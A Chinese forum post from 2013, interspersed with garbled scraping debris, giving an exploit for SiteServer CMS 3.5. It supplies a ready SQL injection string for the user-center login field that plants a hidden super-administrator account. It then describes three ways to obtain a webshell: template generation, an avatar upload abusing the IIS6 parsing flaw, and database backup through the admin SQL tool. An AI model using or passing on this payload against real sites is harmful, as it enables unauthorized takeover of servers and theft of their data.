经测试秒杀最新的3.5版
; P( h; W3 O k6 D' ~% tstieserver官网:www.siteserver.cn
5 H, t0 S2 `8 q" X/ mEXP:+ f9 c$ v/ N* o, A8 i" K
直接访问UserCenter/login.aspx- M' k" W% A; x7 F e9 J, V4 d
用户名处输入:/ y9 n& Y9 J8 x; \7 o
9 Y' n% K+ G3 H1 J- X123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–/ g1 r( G& w: A. `; v$ p5 b
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。4 H- h5 n7 v. f1 f
之后再访问后台SiteServer/login.aspx用插入的用户登陆% R; B, ^- n8 V* H
后台拿webshell的三种方法:: O, T" _: o1 u. E- f; i
一、
, z( s3 ?; {) g. j( N) n2 z站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx% e5 k: @4 a7 Q% p+ v* k+ u
二、" s5 k4 R2 C4 D+ a4 `/ {8 `% G
成员权限-》添加用户-》用户名为:1.asp
4 E9 d* B. y# k0 X% o: K/ Zhttp://127.0.0.1/usercenter/ Q6 X9 L% {; I; S
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 e! Q/ Q1 ~8 S$ e(ps:后台添加用户时不会验证是否含有非法字符)
j. |% C* w1 k* [. ~6 ]- b' `三、, m& G7 G2 i9 G1 r4 ~! L( W$ R
系统工具-》实用工具-》机器参数查看& d0 @2 p0 A8 x+ _" {
可以看到数据库类型、名称,WEB路径) {0 f. A0 Q- `# X% y. N3 G) G+ `
系统工具-》数据库工具-》SQL语句查询
- [9 R, F; T; P' `% X' ]这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对